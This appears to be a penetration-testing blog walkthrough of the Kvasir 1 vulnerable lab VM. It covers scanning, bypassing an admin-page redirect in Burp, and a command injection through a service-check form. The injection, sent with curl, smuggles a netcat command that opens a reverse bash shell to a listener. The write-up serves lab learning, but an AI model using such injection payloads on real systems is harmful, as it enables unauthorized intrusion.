Penetration testing

Kvasir 1 VM Walkthrough

June 14, 2017 by Hashim Shaikh

Kvasir 1 is a vulnerable VM hosted by Rasta Mouse created the challenge. It can be downloaded from the URL,106/

It has Linux operating system that has Virtual Machine OVA format.


  1. Attacker Machine is Kali Linux
  2. Victim Kvasir

When you start the Kvasir VM it will look something as follows:

Debian GNU/Linux 7 kvasir tty1

Kvasir Login:

Let’s us do nmap aggressive and version scan on the target VM with the help of the following command:

#nmap –A –sV

Nmap results show that only port 80/tcp is open that serves HTTP and contains Apache httpd 2.2.22 Debian installation.

Now let us visit the site by entering the following in the URL:

As seen below a login page will appear.

Now let us put Nikto scan in parallel.

The command used for website scanning with Nikto is:

#nikto –h

Also, let us put on scan directory buster parallel.

The following command is used for enumerating the directory on kvasir:

#dirb http:/

By analyzing the output, we can make out that we have to consider the following URL for testing:

Let us visit admin page first. As the page has a 302 redirect, it can be seen in burp suite.

As we would like to see the admin.php in our browser, we request to server

Response from the server:

Now edit 302 to 200 as shown below

After changing the response forward it to the browser, and you will see the following page on the browser:

Service check instruction sounds a good area for command injection. As the status of a service can be found by executing the following command in the terminal:

service apache2 status

Assuming our input will be executed on the terminal we can try for command injection.

Well, I tried few syntax, few commands but the commands failed.

Compiling a correct syntax was a bit difficult task.

The following command was able to give me shell access:

#curl –data”service=ssh; netcat –e /bin/bash 1234; id #&submit=Submit

A listener was setup on port 1234 for any incoming connection.

The command used was:

#nc –lvvp 1234

Finally, I got the shell.

Posted: June 14, 2017
Hashim Shaikh
View Profile

Hashim Shaikh currently works with Aujas Networks. Possessing a both OSCP and CEH, he likes exploring Kali Linux. Interests include offensive security, exploitation, privilege escalation and learning new things. His blog can be found here: and his LinkedIn Profile here: